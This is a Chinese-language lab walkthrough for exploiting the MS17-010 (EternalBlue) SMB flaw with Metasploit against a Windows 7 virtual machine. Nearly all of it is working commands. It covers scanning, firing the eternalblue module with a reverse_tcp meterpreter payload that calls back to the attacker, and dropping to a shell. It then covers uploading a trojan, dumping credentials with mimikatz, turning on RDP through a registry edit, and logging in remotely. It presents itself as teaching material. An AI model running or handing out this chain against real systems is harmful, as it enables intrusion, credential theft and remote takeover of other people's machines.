MSF之ms17-010永恒之蓝漏洞利用

准备

扫描漏洞

漏洞攻击

准备

实验准备环境：

被攻击机：虚拟机win7x64位系统,其IP为：10.101.2.11(关闭了防火墙)

攻击机：虚拟机kali系统，其IP为：192.168.207.130

攻击工具：kali自带的msfconsole工具

扫描漏洞

在kali终端中输入msfconsole

msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)

msf >set RHOSTS 10.101.2.11(设置被扫描IP)

msf >run(进行扫描，观察是否存在该漏洞)

由上图可知，存在MS17-010漏洞

漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)

set RHOST 10.101.2.11(被攻击机IP)

set LHOST 192.168.207.130(设置本地IP)

set LPORT 4444(设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)

show options(查看配置相关信息)

meterpreter >exploit(开始攻击)

攻击成功！

sysinfo爆出系统信息

screenshot截屏，截屏后的图片存放在/root/中

meterpreter >shell，进入靶机cmd

此时，可以新建文件夹，然后

meterpreter >upload植入已经写好的木马！

也可以通过使用msf中的mimikatz，来爆出靶机的用户名和密码，以下是其过程：

首先

netstat -an< 查靶机端口开发情况>

如果没有开启3389端口，可以使用以下命令再cmd中开启：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

其次

meterpreter > load mimikatz

meterpreter > help

meterpreter > msv

meterpreter > ssp

meterpreter > wdigest

meterpreter > kerberos

接下来，就是远程登录靶机

rdesktop 10.101.2.11

成功！